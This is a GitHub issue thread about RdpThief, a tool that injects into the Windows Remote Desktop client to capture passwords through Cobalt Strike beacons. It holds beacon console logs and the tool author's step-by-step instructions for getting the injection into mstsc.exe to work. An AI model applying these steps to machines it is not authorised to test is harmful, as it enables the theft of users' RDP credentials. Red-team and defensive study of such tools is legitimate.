### ISSUE TITLE
Never see the injection happen

### ISSUE THREAD

**Issue by gnomefish** [0x09AL/RdpThief#1]
victim is a windows 10 (local admin user) - seems like the injection is never done. RDP is turned on, and I can RDP into the machine from another machine...

beacon> sleep 0
[*] Tasked beacon to become interactive
[+] host called home, sent: 16 bytes
beacon> rdpthief_enable
[+] RdpThief enabled 

[+] host called home, sent: 12 bytes
[+] host called home, sent: 12 bytes
[+] host called home, sent: 12 bytes
[+] host called home, sent: 12 bytes
[+] host called home, sent: 12 bytes
[+] host called home, sent: 12 bytes
[+] host called home, sent: 12 bytes
[+] host called home, sent: 12 bytes
[+] host called home, sent: 12 bytes
[+] host called home, sent: 12 bytes
[+] host called home, sent: 12 bytes
[+] host called home, sent: 12 bytes
[+] host called home, sent: 12 bytes
[+] host called home, sent: 12 bytes
beacon> rdpthief_disable
[+] Disabling RdpThief
beacon> rdpthief_dump
[*] Tasked beacon to run: type %temp%\data.bin
[+] host called home, sent: 51 bytes
[+] received output:
The system cannot find the file specified.

**Comment by 0x09AL** [comment]
Hi, the injection should happen on the client not the server. The purpose of the tool is to extract passwords from the RDP Client.

**Comment by gnomefish** [comment]
Yep this is beacon on the client, when i rdp to the client nothing happens

**Comment by 0x09AL** [comment]
Can you please follow the steps below :
1. Initiate beacon in your client.
2. Re/Load the script.
3. Run sleep 0 and rdpthief_enable
4. Run Remote Desktop Client on the client you have the beacon.
5. Run ps on the Cobalt Strike client beacon console.
6. Verify mstsc.exe is in the list.
7. Rdpthief should have been injected.

If this doesn't work, can you give more details on your setup ?

**Comment by jazzbydaway** [comment]
Hi @0x09AL,

I followed the above steps and I am getting the same error message - [05/23 12:26:33] beacon> rdpthief_dump
[05/23 12:26:33] [*] Tasked beacon to run: type %temp%\data.bin
[05/23 12:26:34] [+] host called home, sent: 51 bytes
[05/23 12:26:34] [+] received output:
The system cannot find the file specified.


Current setup - create a x64 payload and dropped on windows 11 laptop with av and firewall disabled, also tried on windows VM and server 2019.
